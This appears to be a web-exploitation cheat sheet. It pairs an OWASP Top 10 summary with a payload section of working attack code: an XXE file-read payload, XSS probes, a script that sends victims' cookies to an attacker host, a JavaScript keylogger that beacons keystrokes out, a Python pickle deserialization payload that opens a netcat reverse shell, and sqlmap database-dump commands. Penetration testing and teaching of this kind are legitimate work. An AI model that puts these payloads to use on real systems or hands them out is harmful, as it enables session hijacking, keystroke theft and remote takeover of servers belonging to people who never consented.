Web exploitation cannot happen without proxying and advanced tools such as:

  • Burp Suite
    • Not open-source but offers a free community edition [Link].
  • OpenVAS
    • Free and open-source [Link].

It is fundamental to master all OWASP TOP 10 vulnerabilities:

  • A01:2021 – Broken Access Control
    • Incorrectly implemented authentication and session management calls.
  • A02:2021 – Cryptographic Failures
    • Fail to protect the data in transit and at rest. Example: plan text passwords, do not use SSL…
  • A03:2021 – Injection
    • Insecure code to insert (or inject) as if it was part of the code of the program.
  • A04:2021 – Insecure Design
    • Missing or ineffective control in the design of the application.
  • A05:2021 – Security Misconfiguration
    • Misconfigured access controls such as default credentials or empty passwords.
  • A06:2021 – Vulnerable and Outdated Components
    • When the software is vulnerable, unsupported, or out of date. Including the OS, dependencies…
  • A07:2021 – Identification and Authentication Failures
    • Fail to confirm the user’s identity, authentication, and session management.
  • A08:2021 – Software and Data Integrity Failures
    • Data integrity issues related to code or infrastructure. Violations caused by libraries from untrusted sources, CDNs…
  • A09:2021 – Security Logging and Monitoring Failures
    • Issues that fail to detect, escalate, and respond to active breaches.
  • A10:2021 – Server-Side Request Forgery (SSRF)
    • Flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL.

PAYLOADS

  • XXE (XML eXternal Entity attack)
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
  • XSS (possible in Javascript, VBScript, Flash, and CSS)

Main categories of attacks:

  • Reflected XSS – A link that contains a script embedded within it that executes when visited.
  • Stored XSS – Implants a persistent script in the target website (usually in the database) which will execute when anyone loads the content.
  • DOM Based XSS – No HTTP request is required. It is injected modifying the DOM of the target site on the client-side (browser).

It is worth mentioning the popular sources of payloads: PayLoadBox [Link], XSS-Payloads [Link].

Quick test for a low hanging fruit:

<script>alert(1)</script>
<image src="javascript:alert(1)">
<body oninput=javascript:alert(1)><input autofocus>
<img \x00src=x onerror="alert(1)">

A payload for stealing Cookies:

<script>document.location='http://ip:port/?='+document.cookie;</script>

A very simple key logger:

<script>
var keys='';
document.onkeypress = function(e) {
  get = window.event?event:e;
  key = get.keyCode?get.keyCode:get.charCode;
  key = String.fromCharCode(key);
  keys+=key;
}
window.setInterval(function(){
  new Image().src = 'https://attackerAddress/kl.php?c='+keys;
  keys = '';
}, 1000);
</script>
<script>

</script>
  • Insecure DeSerialization (the output of the following script is the payload)
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | ' '/bin/sh -i 2>&1 | netcat 10.10.10.10 4444 > /tmp/f'
class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))

INJECTION

  • SQLmap – SQL injection and database takeover [Link]:
sqlmap -r requestFile
sqlmap -r requestFile --dump

Note: the requestFile contains the HTTP request that SQLmap will use to perform iterations of injections.

See more usage and examples of SQLmap on the other post [Link].